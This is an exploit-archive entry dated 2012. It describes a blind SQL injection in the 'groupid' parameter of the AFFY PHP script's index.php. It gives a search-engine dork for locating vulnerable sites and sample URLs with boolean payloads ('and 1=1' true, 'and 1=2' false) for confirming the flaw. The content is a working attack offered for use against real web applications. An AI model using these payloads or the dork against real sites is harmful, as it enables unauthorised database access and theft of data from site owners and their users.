AFFY (index.php) Blind Sql Injection Vulnerability

2012-05-23T00:00:00
ID 1337DAY-ID-18338
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-05-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            AFFY (index.php) Blind Sql Injection Vulnerability
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.affy.no/
.:. Drok           : inurl:"index.php?groupid" "powered by AFFY"      

####################################################################

===[ Exploit ]===


http://SITE/index.php?groupid=1[BLIND]

http://SITE/index.php?groupid=1+and+1=1        True
http://SITE/index.php?groupid=1+and+1=2        False

####################################################################



#  0day.today [2018-02-16]  #